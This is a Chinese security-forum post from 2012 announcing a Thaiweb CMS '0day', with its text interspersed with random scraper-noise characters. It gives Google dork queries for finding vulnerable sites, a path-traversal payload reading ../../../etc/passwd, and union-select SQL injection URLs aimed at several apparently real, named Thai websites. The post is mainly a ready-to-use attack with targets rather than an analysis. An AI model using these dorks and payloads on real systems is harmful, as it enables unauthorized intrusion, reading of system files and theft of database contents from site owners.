找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2120|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:. R' V$ a: V, H1 D0 s

0 Y, v5 o- c  B3 U2 xintext:powered by Thaiweb
. L3 ?( {- \: {  N; G  L% Z: A, M9 p- v/ g
inurl:index.php?page=board.php6 d4 L6 s5 n9 j! Z% f0 n

, I  M6 \  j: I( e4 I3 |/ t 4 ?. ]$ l, p6 b; H1 e# M+ i/ ~
2 g- N- t  B" N
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd& E( y5 k  J  b; z
9 i  D0 B: r4 w  `# Z7 \5 y
5 W+ ~4 }5 n3 k; Q

( z; j) j+ K; L8 C. ]利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4': B" A$ ]6 c' B5 [$ {) V
0 u, O) ~5 a& a. E  M/ D

/ v+ b0 y, `3 O3 x/ {" p! W. f3 v0 ~) b1 K  c9 s7 N8 g/ ]/ Z1 f
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--/ @6 E3 Q8 y8 d& y
* N( c' n3 K) i) X+ f
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
3 x: ]$ o* x- E. V; Y0 v& c 2 J5 j8 [4 O. r  @* ?
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--3 I* Y5 t1 C) H5 L: {" f, `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表